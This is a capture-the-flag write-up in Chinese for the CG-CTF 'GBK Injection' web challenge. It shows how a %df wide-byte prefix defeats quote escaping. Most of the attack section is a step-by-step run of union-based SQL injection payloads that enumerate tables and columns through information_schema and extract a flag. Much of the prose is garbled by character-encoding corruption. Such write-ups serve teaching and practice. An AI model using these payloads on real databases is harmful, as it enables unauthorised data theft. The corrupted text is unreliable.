GBK Injection

1.題目

2.首先我們進(jìn)入題目地址，發(fā)現(xiàn)下圖所示，首先猜測(cè)可能存在sql注入

3.于是我們嘗試',但被轉(zhuǎn)義了

4.被轉(zhuǎn)義了，那咋辦，此時(shí)，想到了URL中%df與\結(jié)合會(huì)變成運(yùn)，如下圖

5.因此我們可以閉合id的值，使用#，--空格或--+來(lái)注釋最后一個(gè)’

• 這里對(duì)#進(jìn)行了過(guò)濾，但我們可以使用%23進(jìn)行繞過(guò)
• –空格也是標(biāo)準(zhǔn)的SQl注釋語(yǔ)句，但這里對(duì)空格進(jìn)行了過(guò)濾，但我們可以使用%20繞過(guò)
• –+不是標(biāo)準(zhǔn)的SQL注釋語(yǔ)句，但是+在查詢(xún)語(yǔ)句中變成了空格，從而最后整體也變成了注釋符–空格

–+變–空格，實(shí)例圖：

6.那我們接下來(lái)依次進(jìn)行查詢(xún)爆破

• 判斷sql查詢(xún)語(yǔ)句字段數(shù)量，可知sql查詢(xún)語(yǔ)句有兩個(gè)字段
  %df' order by 2 %23
• 判斷哪些字段可利用，可知sql查詢(xún)語(yǔ)句第2字段可用
  %df' and 1=2 union select 1,2 %23
• 判斷當(dāng)前數(shù)據(jù)庫(kù)，這只當(dāng)前數(shù)據(jù)庫(kù)為sae-chinalover
  %df' and 1=2 union select 1,database() %23
• 判斷sae-chinalover數(shù)據(jù)庫(kù)下所有的表名，分別為：ctf,ctf2,ctf3,ctf4,gbksqli,news
  %df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652D6368696E616C6F766572 %23
• 判斷ctf4表中的字段(這里是依次判斷才發(fā)現(xiàn)ctf4里有flag)，為：id,flag
  %df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634 %23
• 判斷id與flag字段的值，結(jié)果為：1 flag{this_is_sqli_flag}
  %df' and 1=2 union select 1,group_concat(id,char(32),flag) from ctf4 %23

注：可能flag輸入后還是錯(cuò)誤，我認(rèn)為可能后臺(tái)管理出了一點(diǎn)問(wèn)題，修改了flag值卻沒(méi)有更新
大家如果想了解sql(非盲注)，請(qǐng)點(diǎn)擊傳送門(mén)

總結(jié)

以上是生活随笔為你收集整理的CG-CTF-Web-GBK Injection的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。